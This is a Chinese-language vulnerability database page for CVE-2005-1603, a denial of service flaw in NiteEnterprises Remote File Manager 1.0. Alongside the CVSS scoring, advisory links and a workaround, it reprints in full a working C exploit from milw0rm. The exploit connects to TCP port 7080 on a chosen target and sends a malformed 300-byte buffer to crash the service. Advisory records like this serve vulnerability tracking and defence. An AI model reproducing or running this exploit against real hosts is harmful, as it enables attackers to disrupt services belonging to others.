CVE-2005-1603
CVSS5.0
发布时间 :2005-05-16 00:00:00
修订时间 :2011-03-07 21:22:14
NMCOE    

[原文]NiteEnterprises Remote File Manager 1.0 allows remote attackers to cause a denial of service (crash) via a crafted string to TCP port 7080.


[CNNVD]NiteEnterprises Remote File Manager拒绝服务漏洞(CNNVD-200505-1068)

        NiteEnterprises Remote File Manager 1.0允许远程攻击者通过发到TCP端口7080的特制的字符串来发起拒绝服务攻击(崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1603
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1603
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1068
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/0501
(UNKNOWN)  VUPEN  ADV-2005-0501
http://www.securityfocus.com/bid/13550
(UNKNOWN)  BID  13550
http://www.osvdb.org/16158
(UNKNOWN)  OSVDB  16158
http://secunia.com/advisories/15299
(UNKNOWN)  SECUNIA  15299
http://archives.neohapsis.com/archives/fulldisclosure/2005-05/0129.html
(UNKNOWN)  FULLDISC  20050508 Server Remote File Manager DOS Exploit

- 漏洞信息

NiteEnterprises Remote File Manager拒绝服务漏洞
中危 其他
2005-05-16 00:00:00 2005-10-20 00:00:00
远程  
        NiteEnterprises Remote File Manager 1.0允许远程攻击者通过发到TCP端口7080的特制的字符串来发起拒绝服务攻击(崩溃)。

- 公告与补丁

        暂无数据

- 漏洞信息 (988)

Remote File Manager 1.0 Denial of Service Exploit (EDBID:988)
windows dos
2005-05-08 Verified
0 basher13
N/A [点击下载]
/*

 Server Remote File Manager DoS Exploit
-------------------------------------------
  INFGP - Hacking&security Research

[+] Attacking  localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost  : Disconected!

Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300

int main (int argc, char *argv[]){

char req[] =
"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&"
"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?"
"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"
"KG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"
"qv#trog.ro#mkodph>qv#trog.ro#mkodph\n";

 unsigned int rc,addr,inetsock ;
 struct sockaddr_in tcp;
 struct hostent * hp;
 WSADATA wsaData;
 char buffer[size];

  memset(buffer,'A',300);
  memcpy(buffer,req,25);

  if(argc < 2) {
 printf("\n\n    Server Remote File Manager DoS Exploit \n", argv[0]);
 printf("   -----------------------------------------\n", argv[0]);
 printf("      INFGP - Hacking&Security Research\n\n", argv[0]);
 printf("[-]Usage: %s [target]\n", argv[0]);
 printf("[?]Exam: %s localhost \n", argv[0]);
 exit(-1) ;
       }

 if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
  printf("WSAStartup failed !\n");
  exit(-1);
 }
  hp = gethostbyname(argv[1]);
 if (!hp){
  addr = inet_addr(argv[1]);
 }
 if ((!hp) && (addr == INADDR_NONE) ){
  printf("Unable to resolve %s\n",argv[1]);
  exit(-1);
 }
 inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 if (!inetsock){
  printf("socket() error...\n");
  exit(-1);
 }
  if (hp != NULL)
  memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
 else
  tcp.sin_addr.s_addr = addr;

 if (hp)
  tcp.sin_family = hp->h_addrtype;
 else
  tcp.sin_family = AF_INET;

 tcp.sin_port=htons(7080);

 printf("\n[+] Attacking  %s..\n" , argv[1]) ;
 printf("[+] Build DOS string\n");
 Sleep(1000);
 printf("[+] Buffer size = %d byte\n" , sizeof(buffer));
 rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
 if(rc==0)
 {

 Sleep(1000) ;
 printf("[+] Sending bad format..\n") ;
 send(inetsock , buffer , sizeof(buffer) , 0);
 printf("[+] %s  : Disconected! \n\n" ,  argv[1]) ;
}
 else {
 printf("[-] Port :7080 is invalid.Server not connected!\n");
}
}

// milw0rm.com [2005-05-08]
		

- 漏洞信息

16158
NiteEnterprises Remote File Manager Malformed String DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

NiteEnterprises Remote File Manager contains a flaw that may allow a remote denial of service. The issue is triggered when an error in the communication handling occurs, and will result in loss of availability for the service.

- 时间线

2005-05-08 Unknow
2005-05-08 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: -Disable the port 7080

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站